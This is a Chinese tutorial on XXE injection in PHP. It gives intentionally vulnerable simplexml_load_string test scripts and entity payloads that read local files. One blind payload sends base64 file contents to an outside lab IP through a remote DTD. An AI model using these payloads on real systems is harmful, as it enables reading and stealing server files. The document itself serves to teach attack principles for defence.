一. 源码
1. 有回显有报错测试代码
<?php
$xml=simplexml_load_string($_GET['xml']);
// print_r($xml);
echo $xml
?>
2. 无回显无报错测试代码
<?php
$xml=@simplexml_load_string($_POST['xml']);
?>
二. 内部实体演示
// &有问题,必须对&进行编码才可以
<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe "Thinking">]><foo>&xxe;</foo>
<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe "Thinking">]><foo>%26xxe;</foo>
三. 外部实体演示
<!ENTITY 实体名称 SYSTEM "URI/URL">
外部引用可支持http,file等协议,不同的语言支持的协议不同,但存在一些通用的协议,具体内容如下所示:
<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///c:/windows/win.ini" >]><foo>%26xxe;</foo>
// 只适用于PHP5.4.45以下版本
四. 参数实体演示
<!ENTITY % 实体名称 “实体的值”>
// or
<!ENTITY % 实体名称 SYSTEM “URI”>
<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY % xxe SYSTEM "http://10.1.1.240:8080/evil.dtd">%xxe;]><foo>&evil;</foo>
evil.dtd
<!ENTITY evil SYSTEM "file:///c:/windows/win.ini" >
五. 无回显演示
// target.php是已知的文件或flage
<!DOCTYPE updateProfile [<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=./target.php"><!ENTITY % dtd SYSTEM "http://10.10.87.228:81/3.txt">%dtd;%send;]>
// evil.dtd
<!ENTITY % all "<!ENTITY % send SYSTEM ‘http://10.1.1.240:8080/?data=%file;’>" > %all;
target.php
sms2056
六. 参考
https://www.freebuf.com/column/156863.html
免责声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。禁止任何人转载到其他站点,禁止用于任何非法用途。如有任何人凭此做何非法事情,均于笔者无关,特此声明。